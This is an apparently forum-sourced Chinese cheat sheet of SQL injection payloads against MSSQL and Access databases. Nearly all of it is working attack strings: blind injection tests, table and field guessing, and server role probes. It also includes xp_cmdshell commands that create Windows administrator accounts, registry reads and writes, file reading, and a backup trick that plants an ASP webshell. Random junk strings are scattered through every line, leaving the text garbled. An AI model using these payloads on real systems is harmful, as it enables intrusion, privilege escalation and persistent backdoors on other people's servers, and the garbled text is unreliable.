1.判断是否有注入;and 1=1 ;and 1=2 _RIU,uJs
2.初步判断是否是mssql ;and user>0 DU!T#H7
FHOw ]"#
3.注入参数是字符'and [查询条件] and ''=' y*iZ;Bv j
dOeM0_o
4.搜索时没过滤参数的'and [查询条件] and '%25'=' >G5aFk
yvB]rz} i
5.判断数据库系统 yzS^8,
=d{6=2Pt
;and (select count(*) from sysobjects)>0 mssql 4zMvHe
[bh?p+V
;and (select count(*) from msysobjects)>0 access 40kAGs>_
z0 9Gp}^;
vywB{%p
ZexC3LD"
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ZE=sw}=
+KTfGwKt
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7%^G]AFi
JH.XZM&
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 P)Adb~r
h[remR#3\
9.(1)猜字段的ascii值(access) PF~@@j
kk=n&M
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ZsP ^<
k$kE5kh,S
(2)猜字段的ascii值(mssql) HgQjw!
!eyLh&]5
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;73S;IPR
2)=whnFS
10.测试权限结构(mssql) eGEwXza 4
Jh\KVmfXN
&nmBsl3Q.
c-$rB_t+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- \}b2oiY
=z# trQ{
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- D:@W*,
#`SAc`:n
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- f+ r>ur}\)
Usf@kVQ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- TUp\,T^2
#<0Hvde
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- B[uyr)$
x$LCLP#$H
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- }3*<sxw7<
-N' (2'
;and 1=(select IS_MEMBER('db_owner'));-- jW:7PS
:4{
`c.S
E/:U,u{
|#yu
11.添加mssql和系统的帐户 if'=W6W
kORWj<
;exec master.dbo.sp_addlogin username;-- @8W@I|
;exec master.dbo.sp_password null,username,password;-- #&|"t<}
H:(B^uH
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- M1Q&)am
|P5dv>tb
F
;exec master.dbo.xp_cmdshell 'net user username password Oa/^A-'Q
+p\E%<uQ
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;?Pz0,{h
1n`[D&?q
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ? $B4'wc5
[E9iuym
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- H9T~7e+
_A,_RM$Y
(>}1t!1
\:m~
+o$<-
12.(1)遍历目录 c^W;p2^
q-z1ElrN7u
;create table dirs(paths varchar(100), id int) u#ya
8
#*A&jo'E
;insert dirs exec master.dbo.xp_dirtree 'c:\' dy6zrgxygP
P@O_MT
;and (select top 1 paths from dirs)>0 ^(;x-d3
H>+/k-n-
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) sV"tN2W@
)>ff"| X
}%XB*pzQ
,3?=W/Um4
(2)遍历目录 v6)QLp
U4d7-&U
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 5]i#l3")
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 M{L<aYe
G!FdTvx$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 va@;V+cD
Sj ovL@X
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 8ve-g\C8 H
xI<l1@
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 JlSqTfA
8g=O0Gb
\gP?uJ
/[6wm1?!
13.mssql中的存储过程 z
4}"oQk:r
OG#^d5(
xp_regenumvalues 注册表根键, 子键 HP*)^`6X
yl>^QMmo
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 @C-dCC?
u4lM>(3Y}
xp_regread 根键,子键,键值名 hEjvtfM9\-
(B` NnL$
;exec xp_regread Z(:\Vj"
(B\Kb4m
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 y1 a%f.F`
zDYJe_m ~
xp_regwrite 根键,子键, 值名, 值类型, 值 =F[M>o
!wAnsK
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 >XZ2w_
2\{/|\
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 9{u/|,rq1
QY+{ OCB
xp_regdeletevalue 根键,子键,值名 G$zY&
N_D=j6B
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 mTH[*Y,
Cdl"TZ<
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %w_MRC
^Ip\`2^u
tDAX
pi(
~RLjL"
14.mssql的backup创建webshell MeD/)T{ G~
++2a xRl
use model wB 8548C}-
G}
[$M"}
create table cmd(str image); -X
EK[
H"+|n2E^
insert into cmd(str) values (''); "% \y$
!h&h;m/c
backup database model to disk='c:\l.asp'; @ &c@
%_]O|(
El`G<esX
[Qk j}
15.mssql内置函数 ]$K5 8C
O,@QGUoA
;and (select @@version)>0 获得Windows的版本号 Mn\L55?E(
t2ui9:g4j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 'e))i#/VF
q+YK NXI
;and (select user_name())>0 爆当前系统的连接用户 Wi)N/^;n
l5e`m^GK
;and (select db_name())>0 得到当前连接的数据库 N*w{NB 7L
7<Ut/1$MI
|b
Z
58{}
Y0'~u+KS`5
16.简洁的webshell Sr10ot&ox
@ceL9#:uc
use model VjSbx'i
D5T0o"A
create table cmd(str image); 0/+TQD!L
tV.96P;)/9
insert into cmd(str) values (''); 78z/D|{"
>48)@sS
backup database model to disk='g:\wwwtest\l.asp';